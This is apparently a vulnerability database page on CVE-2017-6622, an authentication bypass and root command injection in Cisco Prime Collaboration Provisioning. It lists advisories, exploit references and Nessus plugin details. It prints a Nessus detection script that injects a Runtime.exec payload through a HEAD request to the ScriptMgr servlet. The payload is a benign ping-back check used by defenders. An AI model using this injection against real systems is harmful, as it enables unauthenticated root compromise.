Vulnerabilities > CVE-2017-6622 - Missing Authorization vulnerability in Cisco Prime Collaboration Provisioning
Summary
A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Exploit-Db
description | Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution. CVE-2017-6622. Remote exploit for Hardware platform |
file | exploits/hardware/remote/42888.sh |
id | EDB-ID:42888 |
last seen | 2017-09-29 |
modified | 2017-09-27 |
platform | hardware |
port | |
published | 2017-09-27 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/42888/ |
title | Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution |
type | remote |
Nessus
NASL family CISCO NASL id CISCO_PRIME_CP_CVE-2017-6622.NASL description The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these. last seen 2020-06-01 modified 2020-06-02 plugin id 101531 published 2017-07-13 reporter This script is Copyright (C) 2017-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/101531 title Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(101531); script_version("1.6"); script_cvs_date("Date: 2019/03/06 18:38:55"); script_cve_id("CVE-2017-6622"); script_bugtraq_id(98520); script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724"); script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1"); script_xref(name:"ZDI", value:"ZDI-17-445"); script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE"); script_summary(english:"Attempts to perform a remote command injection."); script_set_attribute(attribute:"synopsis", value: "The remote network management server is affected by a remote command execution vulnerability."); script_set_attribute(attribute:"description", value: "The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these."); # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/"); script_set_attribute(attribute:"solution", value: "Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning"); script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CISCO"); script_copyright(english:"This script is Copyright (C) 2017-2019 Tenable Network Security, Inc."); script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin"); script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); # Make sure pcp is detected get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version"); port = get_http_port(default:443); # Vulnerable ScriptMgr servlet is reached through mod_jk banner = get_http_banner(port:port); if (banner !~ "Server:.*Apache.*mod_jk") { audit(AUDIT_LISTEN_NOT_VULN, "Web server", port); } pat = SCRIPT_NAME; if(strlen(pat) > 16) pat = substr(pat, 0, 15); cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + compat::this_host(); qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");'; uri = "/cupm/ScriptMgr?" + qs; method = "HEAD"; res = http_send_recv3( method : method, item : uri, port : port, exit_on_fail : TRUE ); if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200") { filter = "icmp and src " + get_host_ip() + " and dst " + compat::this_host() + " and icmp[icmptype] = icmp-echo"; bpf = bpf_open(filter); if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open"); timeout = 5; t = unixtime(); repeat { frame = bpf_next(bpf:bpf); # ping back seen: cmd injection succeeded ! if (frame && pat >< frame) { vuln = TRUE; break; } }until(unixtime() - t > timeout); bpf_close(bpf); } if(vuln) { req = http_last_sent_request(); security_report_v4( port : port, severity : SECURITY_HOLE, generic : TRUE, request : make_list(req) ); } else { audit(AUDIT_LISTEN_NOT_VULN, "Web server", port); }
NASL family CISCO NASL id CISCO_PRIME_CP_SA-20170517-PCP1.NASL description According to its self-reported version number, the remote Cisco Prime Collaboration Provisioning server is 9.x, 10.x, 11.x, or 12.x prior to 12.1. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the web interface when handling HTTP requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose sensitive information about the application, such as user credentials. (CVE-2017-6621) - An authentication bypass vulnerability exists in the web interface due to missing security restraints in certain HTTP request methods that could allow accessing files. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to bypass authentication and execute arbitrary commands with root privileges. (CVE-2017-6622) - A flaw exists in the web interface that allows directory traversal outside of a restricted path due to improper validation of HTTP requests and a failure to apply role-based access controls (RBACs) to requested HTTP URLs. An authenticated, remote attacker can exploit this, via a specially crafted request that uses path traversal, to delete arbitrary files from the system. (CVE-2017-6635) Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 100323 published 2017-05-22 reporter This script is Copyright (C) 2017-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/100323 title Cisco Prime Collaboration Provisioning < 12.1 Multiple Vulnerabilities (cisco-sa-20170517-pcp1 - cisco-sa-20170517-pcp3)
Packetstorm
data source | https://packetstormsecurity.com/files/download/144420/cpcp-bypassexec.txt |
id | PACKETSTORM:144420 |
last seen | 2017-09-30 |
published | 2017-09-29 |
reporter | Adam Brown |
source | https://packetstormsecurity.com/files/144420/Cisco-Prime-Collaboration-Provisioning-Authentication-Bypass-Code-Execution.html |
title | Cisco Prime Collaboration Provisioning Authentication Bypass / Code Execution |
Saint
bid | 98520 |
description | Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability |
id | net_cisco_primecollaboration |
title | cisco_prime_cp_scriptmgr_head |
type | remote |
References
- http://www.securityfocus.com/bid/98520
- http://www.securityfocus.com/bid/98520
- http://www.securitytracker.com/id/1038507
- http://www.securitytracker.com/id/1038507
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
- https://www.exploit-db.com/exploits/42888/
- https://www.exploit-db.com/exploits/42888/